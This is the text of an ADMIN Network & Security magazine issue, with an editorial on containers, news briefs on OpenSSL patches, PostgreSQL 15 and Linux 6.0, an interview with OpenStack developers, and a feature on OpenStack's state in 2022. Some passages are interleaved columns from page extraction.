
ADMIN Network & Security – ISSUE 72

OpenStack
• Sensible deployments
• Small business alternatives
• What’s new in OpenStack?

Cybersecurity Maturity Model Certification
VPN with SoftEther
Git Versioned Backups
Windows Subsystems for Linux and Android
Parity Declustering RAID: Decrease resilvering times
Siege: Website stress and benchmarking tool
NetTools: Simplified AD troubleshooting
Microsoft Purview: Data security in the hybrid working world
Age: Simple, secure file encryption

FREE DVD

WWW.ADMIN-MAGAZINE.COM
Welcome to ADMIN

Container Angst
Just because it’s new, doesn’t mean it’s better. How I learned to stop worrying and love the old containers.

The IT world went container crazy a few years ago when Docker first hit the scene. Although I’m into
virtualization of all types, I totally missed out on Docker-mania. I never really “got” what all the hype was
about when containers had been around for about 40 years. There was never any excitement around them
until the whole Docker craze struck the hearts and minds of IT folk. I like containers. They’re easy to set up
and easy to manage, and there are lots of advantages of a lightweight but robust virtualization solution.
I’d been working with containers for years before Docker came along and spoiled it for everyone. Well, it was
spoiled for everyone who knew that containers weren’t new or spectacular in any way. It didn’t matter
how long containers had been around; these newfangled, fancier containers were somehow newer and
more exciting, something we’d never seen or heard of.
To the whole ridiculous whimsical container sickness, I say, “Bah. Humbug!” I love containers. Containers
aren’t the problem. It’s the madness surrounding them that irritates me. Other container technologies are
just as exciting as Docker containers. Podman, for example, is a great container technology from Red Hat.
Both technologies have their advantages and disadvantages.
I’m a fan of the old-school chroot jails, Solaris zones, and even the newer system container implementation,
systemd-nspawn. I like the simplicity of these “standard” container technologies. Attempting to create a cross-
platform, write-once-play-anywhere technology sounds great, but the problem for me is that I’m required
to install so much supporting software that it takes away the lightweight nature of the original idea. I don’t
necessarily think that every technology must be cross-platform capable. Some things should be operating
system-specific or at least operating system-optimized. For example, you can run an Apache web server,
PHP, and MySQL on Windows (WAMP), but when Linux is freely available and LAMP (Linux, Apache, MySQL, PHP)
stacks come prepackaged – even as container and virtual machine (VM) images – I’m not sure why one would go
to the trouble to create a WAMP stack (although I’ve done it).
I think a mixture of containers and full-featured VMs is the best solution. The Proxmox project offers this on
a single host system, which is a blending of the OpenVZ container technology and KVM/Qemu, as I recall. I’m
a huge fan of the OpenVZ container implementation. I can have a fully ready-to-run container host system
operable in about an hour that has the capability of hosting hundreds of container virtual machines.
Don’t get me wrong. I love new technology. More than once, I’ve shunned currently available technology for
something much improved. And it only makes sense that not every new solution will appeal to everyone. I like
a new solution that is more efficient, cost-effective, or labor-saving, or so clever that I can’t say anything
bad about it. If a newfangled whatever isn’t in some way an improvement, then I’ll take a hard pass on it. I
don’t need to change what I’ve done for the past five years just because there’s a new thing available. Show
me how it’s better, and I’ll buy in; otherwise, keep moving. This is how I feel about certain container
solutions mentioned above. They don’t seem to improve on previous technology enough to go to the trouble of
learning or using them. If you use Docker or Podman, live long and prosper. You might have the right
temperament for them, but I don’t. My motto is, “Just because you can do something, doesn’t mean you should.”
I can create concrete furniture, but I don’t see the point of doing it, so I refrain.
I’m rarely an early adopter of the latest and greatest technology, not because I’m afraid of the technology
but because of its vulnerabilities and security holes. Avoiding unnecessary risk is my jam, and I’m sticking
to it for better or worse. Now, where are my hammer, chisel, and stone tablets? Too bad there’s not a “Find
my ancient tools” app available somewhere. Now that’s something I could use. Perhaps a “pinch zoom” on
common household items with tiny writing is also too tall an order. People would rather invent things we
don’t need than those we do.

Ken Hess • ADMIN Senior Editor

Image © Jakarin Niamkiang, 123RF.com

WWW.ADMIN-MAGAZINE.COM | ADMIN 72 | 3
SERVICE | Table of Contents

ADMIN Network & Security

Features

10 OpenStack Interview
Developers Thierry Carrez and Jeremy Stanley talk about problems, innovations, and future plans.

14 OpenStack News
The unprecedented hype surrounding OpenStack 10 years ago changed to disillusionment, which has nevertheless had a positive effect: OpenStack is still evolving and is now mainly deployed where it actually makes sense to do so.

20 Sovereign Cloud Stack
Operators of OpenStack need to know whether their environment is working and quickly pinpoint problems. We look at the basics of observability in the Sovereign Cloud Stack.

24 Container Issues
As the major Linux distributors increasingly lean toward containers, many administrators have come to realize that containers are by no means a panacea for all their problems.

Tools

30 Git Versioned Backups
The open source Git tool from the developer world delivers backups and version control.

36 VPN with SoftEther
SoftEther is lean VPN software that outpaces the current king of the hill, OpenVPN, in terms of technology and performance.

40 Windows Subsystems
WSL runs graphical Linux applications on Windows 11, and WSA shows that Windows can be a platform for Android apps.

Containers and Virtualization

46 Siege Benchmarking Tool
A stress and benchmarking tool for websites controlled from the command line.

50 OpenStack Alternatives
OpenStack is considered the industry standard for building private clouds, but the solution is still far too complex and too difficult to maintain and operate for many applications. What causes OpenStack projects to fail, and what alternatives do administrators have?

Security

56 Age/Rage File Encryption
Age and Rage are the Go and Rust implementations of a simple, modern, and secure file encryption tool.

58 WSL Vulnerabilities
Several tactics, techniques, and procedures circulating among cybercriminals exploit Windows Subsystem for Linux as a gateway. We look at how WSL can be misused and some appropriate protections.

62 Zeek
An arsenal of scripts for monitoring popular network protocols, along with its own policy scripting language for customization.

Management

64 NetTools for AD
This set of utilities extracts information from Active Directory to help simplify troubleshooting and administration.

70 Samba AD Domain Controller
The open source Samba service can act as an Active Directory domain controller in a heterogeneous environment.


10, 14, 20 | OpenStack


OpenStack 2022
Find out whether the much evolved
OpenStack is right for your private cloud.

Highlights

50 OpenStack 64 NetTools 76 Midmarket IAM


Alternatives This bouquet of utilities Identity access management is
If OpenStack is overkill for squeezes the last snippet expensive and more important
your company, you should of information out of than ever in small and mid-sized
consider a solution that Active Directory – and it's enterprises, so make sure you
brings together elements of fun to use! know how to evaluate products
open source software. and implement your solution.

Nuts and Bolts Nuts and Bolts On the DVD

76 Midmarket IAM 88 Analyzing Logs in HPC Fedora is the upstream source for Red
Identity and access Log analysis can be used to Hat Enterprise Linux and is based on
management in midmarket great effect in HPC systems. the latest server technology to provide
organizations. We present an overview of
a “stable, flexible, and universally ad-
the current log analysis
80 CMMC technologies. aptable basis for the everyday provisi-
The US Cybersecurity Maturity on of digital services and information.”
Model Certification will be 93 Performance Dojo Fedora 36 Server changes include an
required by mid-2023 to Sensor tools provide highly updated Ansible 5 and Podman 4.0, and
handle controlled unclassified variable data from a variety
the RPM database has been moved
information and win federal of sources. We look at some
contracts, but it can also help tools to verify the temperature from /var to /usr. For more information
minimize business risk and keep of components on diverse on Fedora 36 Server, go to https://docs.
information out of the hands of hardware. fedoraproject.org/fedora-server/.
adversaries.

84 Declustered Parity
dRAID decreases resilvering
times, restoring a pool to full
redundancy in a fraction of
the time over the traditional
RAIDz. Service
3 Welcome
6 News
97 Back Issues
98 Call for Papers

NEWS | ADMIN News

News for Admins

Tech News
OpenSSL 3.0.7 Patches Serious Vulnerabilities
OpenSSL has issued an advisory (https://www.openssl.org/news/secadv/20221101.txt) relating to two vulnerabilities (CVE-2022-3602 and CVE-2022-3786), which affect OpenSSL versions 3.0.0 through 3.0.6. These vulnerabilities have been addressed with the release of OpenSSL 3.0.7, so users should update now.
“Users of OpenSSL 3.0.0–3.0.6 are encouraged to upgrade to 3.0.7 as soon as possible. If you obtain your copy of OpenSSL from your operating system vendor or other third party then you should seek to obtain an updated version from them as soon as possible,” the OpenSSL team says (https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/).
In a previous announcement (https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html), these vulnerabilities were described as “critical,” possibly leading to remote code execution. However, the OpenSSL project team has since downgraded the threats to “high,” saying they “are not aware of any working exploit that could lead to remote code execution” and have no evidence of the vulnerabilities being exploited at this time.

IBM Introduces Diamondback Tape Library


IBM recently introduced the Diamondback Tape Library, “a high-density archival storage solution that is physically air-gapped to help protect against ransomware and other cyber threats in hybrid cloud environments.”
The Diamondback Tape Library (https://www.ibm.com/products/diamondback-tape-library) is aimed at organizations that need to secure hundreds of petabytes of data, such as hyperscale cloud providers and global enterprises aggregating massive data sets, according to the announcement (https://www.hpcwire.com/off-the-wire/ibm-releases-its-diamondback-tape-library/). “It provides long-term storage and is designed to provide a significantly smaller carbon footprint compared to flash or disk storage, and with a lower total cost of ownership.”
The main benefits of IBM Diamondback, the announcement says, include:

• Sustainability
• Ransomware protection and cyber resiliency
• Data capacity and storage costs

“The IBM Diamondback Tape Library provides critical protection against a variety of threats, helping minimize data center floor space requirements and organizations’ carbon footprint[s],” says Scott Baker, Vice President and Chief Marketing Officer of IBM Storage.

Sidebar: Get the latest IT and HPC news in your inbox. Subscribe free to ADMIN Update and HPC Update: bit.ly/HPC-ADMIN-Update

Lead Image © vlastas, 123RF.com

6 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M

PostgreSQL 15 Released
The PostgreSQL Global Development Group has released version 15 of the open source PostgreSQL
(https://www.postgresql.org/) database.
PostgreSQL 15 now also includes the SQL standard MERGE (https://www.postgresql.org/docs/15/sql-merge.html) command, which “lets you write conditional SQL statements that can include INSERT, UPDATE, and DELETE actions within a single statement.”
According to the announcement, PostgreSQL 15 also includes performance improvements “with noticeable gains for managing workloads in both local and distributed deployments, including improved sorting.” Specifically, PostgreSQL 15 offers improved in-memory and on-disk sorting (https://www.postgresql.org/docs/15/queries-order.html) algorithms, with benchmarks showing increases of 25–400 percent depending on data type.
“The PostgreSQL developer community continues to build features that simplify running high
performance data workloads while improving the developer experience,” said Jonathan Katz, a
PostgreSQL Core Team member.
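The point of MERGE is that it folds the classic "update if the row exists, delete if flagged, otherwise insert" pattern into one statement instead of separate queries. As a rough illustration of those semantics only (a toy sketch in plain Python, not PostgreSQL itself; table rows are modeled as dicts keyed by primary key):

```python
def merge(target, source):
    """Mimic MERGE semantics: for each source row, UPDATE the matching
    target row, DELETE it when flagged, or INSERT when unmatched."""
    for key, row in source.items():
        if key in target:
            if row.get("deleted"):      # WHEN MATCHED ... THEN DELETE
                del target[key]
            else:                       # WHEN MATCHED ... THEN UPDATE
                target[key].update(row)
        elif not row.get("deleted"):    # WHEN NOT MATCHED ... THEN INSERT
            target[key] = dict(row)
    return target

# Hypothetical inventory table and a batch of incoming changes.
stock = {1: {"qty": 5}, 2: {"qty": 0}}
deltas = {1: {"qty": 8}, 2: {"deleted": True}, 3: {"qty": 2}}
print(merge(stock, deltas))
```

In PostgreSQL the same logic is expressed declaratively with `MERGE INTO ... USING ... WHEN MATCHED / WHEN NOT MATCHED` clauses and executes as a single atomic statement.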

Hackers Weaponize Open Source Software in Targeted Phishing Attempts


The Microsoft Threat Intelligence Center (MSTIC) has recently detected a wide range of phishing attempts using weaponized open source software.
These attempts, attributed to ZINC (https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/), have used traditional social engineering tactics by contacting individuals with fake job offers on LinkedIn. “Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads,” Microsoft says (https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/).
MSTIC has observed ZINC, also known as Lazarus, using weaponized versions of open source software including PuTTY, KiTTY, and TightVNC installer for these attacks, which have targeted “employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia.”
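One basic defense against trojanized builds of tools like PuTTY is to verify a download's SHA-256 checksum against the value published on the project's official site before running it. A minimal sketch (the installer bytes and checksum here are placeholders, not PuTTY's real values):

```python
import hashlib
import hmac

def sha256_matches(data: bytes, expected_hex: str) -> bool:
    """Hash the downloaded bytes and compare against the checksum
    published on the upstream project's download page."""
    digest = hashlib.sha256(data).hexdigest()
    # compare_digest avoids timing side channels; overkill for a local
    # check, but a good habit when comparing digests.
    return hmac.compare_digest(digest, expected_hex.lower())

installer = b"example installer bytes"  # stand-in for a downloaded file
good = hashlib.sha256(installer).hexdigest()  # value from the vendor site
print(sha256_matches(installer, good))          # True
print(sha256_matches(b"tampered bytes", good))  # False
```

A checksum check only helps if the expected value comes from the genuine project site over HTTPS; attackers distributing rebuilt installers rarely control that channel as well.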

Linux Kernel 6.0 Announced


Linus Torvalds has released Linux kernel 6.0 (https://lwn.net/Articles/910086/), noting that the version
number change is more a matter of practicality than reflective of any fundamental changes.
“But of course there’s a lot of various changes in 6.0,” Torvalds says. “We’ve got over 15k non-merge commits in there in total, after all, and as such 6.0 is one of the bigger releases at least in numbers of commits in a while.”
According to Jon Corbet at LWN.net, “headline features of this latest release include a number of io_uring improvements, including support for buffered writes to XFS filesystems and zero-copy network transmission, an io_uring-based block driver mechanism, the runtime verification subsystem, and much more.”
See change details in LWN’s merge-window summaries (part 1 [https://lwn.net/Articles/903487/] and part 2 [https://lwn.net/Articles/904032/]) and read more at LWN.net (https://lwn.net/Articles/910086/).

Google Announces TensorStore for High-Performance Array Storage


Google has announced TensorStore, an open source, C++ and Python library designed for reading
and writing large multi-dimensional arrays.
Many contemporary computer science applications manipulate huge, multi-dimensional datasets, says Google. “In these settings, even a single dataset may require terabytes or petabytes of data storage. Such datasets are also challenging to work with as users may read and write data at irregular intervals and varying scales, and are often interested in performing analyses using numerous machines working in parallel,” Google explains.
TensorStore is an open source software library that, according to the website (https://google.github.io/tensorstore/#concepts):

8 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M

• Provides a uniform API for reading and writing multiple array formats
• Natively supports multiple storage drivers, including Google Cloud Storage, local and network
filesystems, in-memory storage
• Automatically takes advantage of multiple cores for encoding/decoding and performs multiple
concurrent I/O operations to saturate network bandwidth
• Enables high-throughput access even to high-latency remote storage

“Processing and analyzing large numerical datasets requires significant computational resources,” says Google, which “is typically achieved through parallelization across numerous CPU or accelerator cores spread across many machines.” Thus, according to Google, “a fundamental goal of TensorStore has been to enable parallel processing of individual datasets that is both safe (i.e., avoids corruption or inconsistencies arising from parallel access patterns) and high performance (i.e., reading and writing to TensorStore is not a bottleneck during computation).”
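According to the TensorStore documentation, the uniform API works by addressing a dataset through a declarative JSON spec that names an array-format driver and an underlying key-value store. A sketch of such a spec (the bucket and path are invented for illustration), pairing the Zarr format with the Google Cloud Storage driver mentioned in the bullets above:

```json
{
  "driver": "zarr",
  "kvstore": {
    "driver": "gcs",
    "bucket": "example-bucket",
    "path": "volumes/example-array/"
  }
}
```

Swapping the `kvstore` driver (e.g., to a local filesystem or in-memory store) changes where the data lives without changing how application code reads or writes the array.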

NIST and Google Partner to Develop Open Source Chips


Google and the National Institute of Standards and Technology (NIST) have signed a research and development agreement (https://www.commerce.gov/news/press-releases/2022/09/nist-and-google-create-new-supply-chips-researchers-and-tech-startups) for production of open source chips.
The chips will be manufactured by SkyWater Technology in Minnesota, according to the announcement. “Google will pay the initial cost of setting up production and will subsidize the first production run. NIST, with university research partners, will design the circuitry for the chips. The circuit designs will be open source, allowing academic and small business researchers to use the chips without restriction or licensing fees.” As many as 40 different chip designs are planned, which will be optimized for different applications.
“The SkyWater foundry will produce the chips in the form of 200-mm discs of patterned silicon, called wafers,” the announcement says, and the first production run will be distributed to leading US universities. “Giving researchers access to chips in this format will allow them to prototype designs and emerging technologies that, if successful, can be integrated into production more quickly, thus speeding the transfer of technology from lab to market.”
“By creating a new and affordable domestic supply of chips for research and development, this collaboration aims to unleash the innovative potential of researchers and startups across the nation,” says Under Secretary of Commerce for Standards and Technology and NIST Director Laurie E. Locascio.

Security and Compliance Drive Adoption of Observability Practices


New Relic’s 2022 Observability Forecast (https://newrelic.com/observability-forecast/2022/about-this-report) surveyed tech professionals across 14 countries to better understand their use and adoption of observability tools and approaches.
In regard to what is driving adoption of observability practices, the top response was an increased focus on security, governance, risk, and compliance (49%). Other factors included:

• Development of cloud-native application architectures (46%)
• Increased focus on customer experience management (44%)
• Migration to multi-cloud environment (42%)
• Adoption of open source technologies (39%)

The survey also asked whether practitioners viewed observability as more of an enabler for achieving business goals or more for incident response, with the following results:

• Observability was completely or generally for achieving core business goals (50%)
• Observability was equally for business goals and incident response (28%)
• Observability was more for incident response/insurance (21%)

The survey also found that “IT operations teams were most likely to be responsible for observability followed by network operations and DevOps teams.”

FEATURE | OpenStack Interview

Questions about the present and future of OpenStack

Maturity Processes
OpenStack has been on the market for 12 years and is generally considered one of the great open source
projects. Thierry Carrez and Jeremy Stanley both work on the software and provide information about
problems, innovations, and future plans. By Ulrich Bantle

Thierry Carrez, General Manager at the OpenInfra Foundation, was involved in founding the OpenStack project as a systems engineer and still contributes to its governance and release management. A fellow of the Python Software Foundation, he previously worked as technical lead for Ubuntu Server at Canonical, operations lead for the Gentoo Linux Security team, and IT manager at various companies. (Photo by Julien DI MAJO on Unsplash)

ADMIN Magazine: The OpenStack Foundation has changed its name to the OpenInfra Foundation. Can you say something about the part OpenStack plays in this new setting?

Thierry Carrez: The foundation was originally created to host and promote the OpenStack project. In the process of doing so in the last 10 years, we assembled a wide community of operators, organizations, and developers interested in the concept of using open source solutions to provide infrastructure. With such an audience, it is only natural that we support and host other projects that are relevant for the same audience. This is why we became the OpenInfra Foundation: to support other open infrastructure projects beyond OpenStack that are of interest to the group of infrastructure providers we assembled. OpenStack is still by far the largest project hosted at the Foundation, though, so it is central to all of our activities. With the change and the new project hosting offering we presented at the 2018 Summit in Berlin, we are ready to tackle the next decade of open infrastructure projects.

AM: OpenStack celebrates its 12th anniversary this year. Where do you see it in the coming years, and what will change?

TC: Today, OpenStack is the de facto open source standard for deploying cloud infrastructure services, be it to offer private resources for a given organization or public resources for customers around the world with a credit card. Combined with the Linux kernel and Kubernetes for application orchestration, it forms a very popular open source framework, the Linux OpenStack Kubernetes Infrastructure (LOKI). Usage is growing significantly, driven by new requirements and new practices. That said, OpenStack is functionally mature and its scope now well defined, so I expect new development to slow down and focus on maintenance going forward. In the same way Linux kernel development is driven by new capabilities in computer hardware, I expect OpenStack development also to be driven by new capabilities in data center hardware needing to be made available to the software.

AM: OpenStack is still a very successful project with big numbers, but some critics say the growth in installations belongs more to existing customers than to new customers. Is that right?

TC: It's really both. In June we held our first in-person event since the pandemic, the OpenInfra Summit in


Berlin [1]. We met one new user after another, many of them running at impressive scale surpassing 100,000 cores of compute on OpenStack. New requirements like digital sovereignty are driving a lot of adoption, especially in scientific use cases and the public cloud in Europe. The need to deploy new municipal and research systems rapidly for pandemic response also resulted in a lot of additional deployments worldwide. Existing implementations keep growing, as well. It's a healthy balance of energy and creativity for the community.

AM: When you take a look at possible competitors, why should users choose OpenStack and not AWS? What are the main differences?

TC: Users should always choose the solution that is the best for their specific needs. There are many reasons why someone would choose one, the other, or both. Our community tells us that they see OpenStack playing an important role to control their infrastructure costs, or to fulfill their regulatory requirements, or to answer very specific use cases for which hyperscalers can't provide a good solution. In those strategies, private OpenStack clouds are often used in combination with AWS, Azure, Google, or one of the many OpenStack-based public clouds in a multi-cloud or hybrid cloud deployment. That said, the main difference between OpenStack and proprietary clouds is the ability to participate in an open, active community and directly influence the direction of the project through personal involvement. That's something proprietary solutions will never match.

Jeremy Stanley has worked as a Unix and Linux sys admin for more than two decades, focusing on information security, Internet services, and data center automation. He is a core member of the OpenStack project's infrastructure team, serving on both the technical committee and the vulnerability management team.

AM: Companies are desperately looking for developers and IT experts. What steps are planned to make OpenStack easier to use to mitigate this staff shortage?

Jeremy Stanley: It's funny: Every time I hear someone talk about how hard OpenStack is to deploy and manage, they inevitably have not touched it for years. The community has made operations a major point for new capabilities, and while infrastructure will always be hard, the stereotypical challenges to deploying and operating OpenStack are no longer issues.

AM: In detail, are there any plans regarding the development of OpenStack to make deployment less complicated?

JS: In recent years, the community has put a lot of energy into supporting installations for a variety of popular configuration management and orchestration solutions like Ansible, Chef, Helm, and Puppet, as well as focusing on both packaging for server distributions and container-based frameworks like Kubernetes.

AM: What do you think could make the installation more simple?

JS: Many new users don't realize that OpenStack isn't an all-or-nothing solution. It's a composable, modular suite of services, most of which are optional, and some can even be used entirely on their own. We're working to amplify this message, because a lot of the perceived complexity is really a result of people mistakenly installing more than they actually need.

AM: Any plans to make the upgrading process less complex and with less downtime?

TC: At this point, upgrading an OpenStack cluster is a pretty established process, and it does not trigger significant downtime. At the same time, the size of deployments has grown significantly, with some now well surpassing the million-core CPU mark. That represents a lot of OpenStack clusters, so keeping them up to date with a release every six months is still significant work. To reduce the pressure to upgrade for established deployments, starting with the OpenStack "Antelope" release in March 2023, OpenStack is offering the possibility to directly upgrade yearly instead of every six months. This should hopefully facilitate the lives of OpenStack operators.

AM: Can you describe the modular architecture of OpenStack?

JS: The fundamental design principle across OpenStack projects is that services interact with each other through REST (i.e., HTTP-based) interfaces to coordinate shared resources. Services are written in a consistent programming language and coding style, avoiding significant duplication through central libraries and consensus around dependencies. The result is a pluggable suite of service options that organizations can tailor to their particular use cases by installing just what they need, while still having the opportunity to grow their solution by adding other services as their requirements change.

AM: What should change in terms of the OpenStack architecture to make management easier?

JS: A significant undertaking, already well underway, is the implementation of an extensible role-based access control model. With this,


operators will be able to delegate likely to need and how best to design the networking data plane for very
permissions for some tasks to other the deployment to maximize effi- large scale clouds or clouds with high
users, reducing their own workload. ciency and minimize cost. network throughput demands. Local
Consumers of the cloud resources IP is a virtual IP that can be shared
will likewise gain the ability to pro- AM: Maybe you could give a special across multiple ports or VMs, is only
vide fine-grained control of specific view on the “Yoga” release and how it reachable within the same physical
actions to relevant stakeholders in helps make things easier. server or node boundaries, and is
their organizations. This work is still optimized for such performance use
in its early stages, with the introduc- JS: It’s hard to single out a few fea- cases.
tion of support for a read-only role to tures, but one good example is that
allow access to audit systems with- Ironic [for provisioning bare metal LM: You gave a talk at the OpenInfra
out the risk that the user might make machines] continued to evolve its Summit to collect scaling stories. Can
changes; the ability to create more defaults to align with more modern you give a short overview of what
specific roles will follow in coming server infrastructures, switching from users reported there and what the
releases. legacy BIOS to UEFI and emphasiz- problems in scaling could be?
ing local boot workflows for deployed
AM: What do you think are the key de- images. Another is Kolla [production- TC: It was a standing room only
ployment challenges that organiza- ready containers and deployment session, and it was great to see op-
tions face with OpenStack?

JS: The hardest challenges, by far, are related to planning and sizing infrastructure. No two use cases are the same, and especially with added complications in obtaining hardware these days, it's more important than ever to be as accurate as possible and not overspend. Unfortunately, sizing a deployment (of anything beyond trivial complexity, not just OpenStack) is more of an art than a science. If you haven't done it often and for a wide variety of solutions, it's hard to even know where to begin. That's really one of the biggest reasons to establish a relationship with an OpenStack distribution vendor: They have more experience than anyone else at estimating how much of what sort of hardware you're

tools], which focused on a single set of container images, rather than trying to maintain two different solutions in parallel, and simplified its design with the addition of a new Ansible collection that is shared across its components. Additionally, Nova added support for offloading the network control plane to a SmartNIC, freeing up more capacity for hypervisor workloads, and can also now provide processor architecture emulation for users who want to run software built for ARM, MIPS, PowerPC, or S/390 systems, all on the same host.

AM: Yoga Neutron has a new feature called Local IP. Can you explain the benefits in performance?

TC: Local IP is primarily focused on high efficiency and performance of

erators of large deployments at Ubisoft, Bloomberg, OVHcloud, CERN, Workday, or Adevinta share their experiences and pain points. They primarily discussed two classic scaling pain points in large OpenStack clusters: RabbitMQ and Neutron. In particular, they traded tips on how best to monitor and alleviate load issues.
This discussion was driven by the operators themselves within the OpenStack Large Scale SIG and is a great example of what open communities can achieve working together – something that is only truly possible with open source software.

Info
[1] OpenInfra Summit Berlin: [https://www.youtube.com/hashtag/openinfrasummit]
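The architecture emulation mentioned above is usually requested per image rather than per boot; a minimal sketch, assuming the hw_architecture image property (the image name is a placeholder, and defining the function executes nothing):

```shell
# Sketch: marking an image so Nova emulates a foreign CPU architecture.
# The property name hw_architecture and all values here are assumptions
# for illustration; check your cloud's supported values first.
tag_image_arch() {
  local image="$1" arch="$2"   # arch: e.g. aarch64, mips64el, ppc64le, s390x
  openstack image set --property hw_architecture="$arch" "$image"
}
```

Instances booted from an image tagged this way would then land on a host that emulates the requested architecture.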

12 ADMIN 72 WWW.ADMIN-MAGAZINE.COM
FEATURE OpenStack News

The state of OpenStack in 2022

Hangover

The unprecedented hype surrounding OpenStack 10 years ago changed to disillusionment, which has
nevertheless had a positive effect: OpenStack is still evolving and is now mainly deployed where it actually
makes sense to do so. By Martin Loschwitz

Photo by vadim kaipov on Unsplash

In the middle of the past decade, it seemed that the leaders of the OpenStack Foundation could hardly believe the success of their product. For a long time, OpenStack trade fairs and, above all, the OpenStack Summit were surrounded by something like a mystical aura: 8,000 participants and more regularly joined the private cloud computing environment camp to catch up on the latest technology. In 2012, an OpenStack sensation began that the industry had never experienced before, especially in the open source software context.
A big bang is inevitably followed by a big hangover at some point, and OpenStack was no exception. Some participants even left the OpenStack party while it was still in full swing. Large OpenStack projects sprang up like mushrooms, fizzling out after months or years, and leaving little behind except frustrated people. Others turned to Kubernetes, which was about to become the next big thing. Following that, the media went quiet about OpenStack.
Some believe that OpenStack has disappeared from the scene, but – to paraphrase Mark Twain – the news of its demise is exaggerated. OpenStack is still an active project today, albeit with a much smaller community. However, it is still evolving, which is reason enough to take a fresh look at OpenStack and ask: What has changed technically, organizationally, and administratively?

OpenInfra

The most noticeable innovation, and one that has packed the biggest punch, is the reorientation of the OpenStack Foundation. Originally, the Foundation had formed to give OpenStack a non-commercial home, which makes sense in the US in particular for various reasons (e.g., a virtual-only project cannot hold any rights to trademarks or brands). On top of that, someone had to pay for the OpenStack party, and one of the Foundation's core tasks is to raise sponsorship money. This task is done on a corporate and individual membership basis, and the money is used to fund the (fairly expensive) OpenStack Summits (Figure 1), among other things.
At the height of the OpenStack hype cycle, the OpenStack Foundation managed to gain significant influence with major vendors like VMware, Intel, Red Hat, and others. As OpenStack's relevance waned, that influence threatened to shrink again, much to the displeasure of the folks at the Foundation. A few years ago, a course of reorientation was determined: The OpenStack Foundation

became the OpenInfra Foundation, and the OpenStack Summit became the OpenInfra Summit. Ever since, OpenStack has been a topic of interest, but it is no longer the only subject of interest to the Foundation.
In recent months, for example, the Foundation has successively revised many tools from OpenStack development, systematically placed them under some kind of project management, and published them. The topics tackled are something like the evergreens of the infrastructure and open source theme: Zuul, for example, the development suite that the Foundation uses to develop OpenStack, is now frequently used outside the project. As with OpenStack itself, the Foundation is responsible for ensuring that the project does not disappear without a trace.
Additionally, the OpenInfra Foundation has put out feelers in quite a few other directions. Similar to the Linux Foundation, it offers an umbrella for open source projects, although the focus is on software that is somehow used in the infrastructure sector. The log manager, Loki (Figure 2), a lightweight alternative to the classic Elasticsearch-Logstash-Kibana (ELK) stack, has now also slipped under the umbrella of the OpenInfra Foundation. Critics welcome this development because the apparent omnipotence of the Linux Foundation had gradually become a problem for many. However, it remains to be seen whether the OpenInfra Foundation will succeed in becoming a long-term and powerful counterweight.

Technical Progress
The truism “you’re always smarter
in retrospect” fully applies to Open-
Stack. In terms of technology, many
of the teething troubles of the early
years are just now disappearing from
the environment. Several factors play
a role: Something recognizably good
for the project is the waning interest
of the major vendors.
Red Hat and Canonical are officially committed to OpenStack to this day, but SUSE, an OpenStack pioneer, has largely abandoned OpenStack development and pulled the plug on its own OpenStack distribution, SUSE Cloud. Accordingly, there is little coming out of those quarters

Figure 1: OpenStack Summit 2022 in Berlin, live again for the first time since the emergence of COVID-19, is still a reunion of sorts, albeit a much smaller one. © OpenInfra Foundation

Figure 2: Loki is a lightweight alternative to the ELK stack and is now one of the OpenInfra Foundation projects. © Loki


in terms of OpenStack source code at the moment. However, it is apparent that the large number of companies that wanted to influence OpenStack, especially in the initial phase of the project, was probably more of a curse than a blessing. A good example of this is provided by Cinder, the OpenStack component that manages storage. When industry leaders argue about architecture decisions on the Cinder mailing list, the only way out is always the lowest common denominator. Now that fewer major players are involved, developers have occasionally dared to make major changes and features that break with old compatibility defaults.
On top of that, the OpenInfra Foundation has now found a stable work approach to help manage the individual OpenStack components and their development in a meaningful way. To date, each component has an engineering owner elected by the community from among its members. The owner is responsible for the development content and is newly elected for each OpenStack development cycle.

Few Massive Changes

If you look at the present OpenStack changelog, you quickly notice that the individual components are now being developed more thoughtfully. In pioneering days, the industry had high expectations that each new OpenStack version had to light a bonfire full of features with groundbreaking innovations. Currently, OpenStack is developing at a far slower pace. Although OpenStack releases do still include thousands of commits and a very long changelog, today the release highlights (i.e., the most important and profound changes in an OpenStack release) tend to fit on a few screen pages, mostly because new OpenStack versions no longer come with new components that no one has heard of before and then disappear into a black hole again two releases later.
The last major OpenStack release ("Yoga," numbered 25) came out at the end of March. A look at its release highlights underscores the fact that OpenStack is now more cautious than it was a few years ago. OpenStack Blazar, for example, is a relatively new OpenStack component that lets users reserve resources for themselves without using them. This ability improves reliability for applications that need guarantees in terms of resources available and the extent of these resources at a certain point in time. In OpenStack Yoga, Blazar can now store more details about individual virtual instances so that the OpenStack Nova scheduler chooses the hosts in a more targeted way.

The Big Six

Most of the changes are found in the six core platform components that together form an OpenStack instance. For example, the storage manager Cinder can now overwrite a virtual volume with the contents of a hard drive image. Until now, this was only possible during virtual machine (VM) creation. Now, however, existing VMs can be re-created without deleting and re-creating the entire VM or disk (reimaging).
Moreover, Cinder now has support for new hardware back ends. In the future, it will be able to use Fibre Channel to address its storage in the form of LightOS over NVMe by TCP, just like Netstor devices from Toyou. NEC V series storage will also support both Fibre Channel and iSCSI in the future.
The Glance image service has always been one of the components with more relaxed development; consequently, it offers little new. Quota information about the stored images can now be displayed; some new API operations for editing metadata tags, for example, have been added; and there are more details about virtual images residing on RADOS block devices (RBDs) in Ceph.

Horizon, Nova, Keystone

The Horizon graphical front end has been massively overhauled by the

Figure 3: The developers have successively improved the theming options for the OpenStack dashboard. Horizon on Ubuntu appears today in the typical Canonical orange. © Ubuntu
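The reimaging described above can also be driven from the command line; a hedged sketch using the long-standing server rebuild path (server and image names are placeholders, and defining the function executes nothing):

```shell
# Sketch: overwrite an existing VM's disk with a fresh image instead of
# deleting and re-creating the VM. All names are placeholders.
reimage_server() {
  local server="$1" image="$2"
  # rebuild keeps the server record and its ports but replaces the disk
  openstack server rebuild --image "$image" --wait "$server"
}
```

The result matches the behavior described above: the VM identity survives while its disk contents are replaced.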

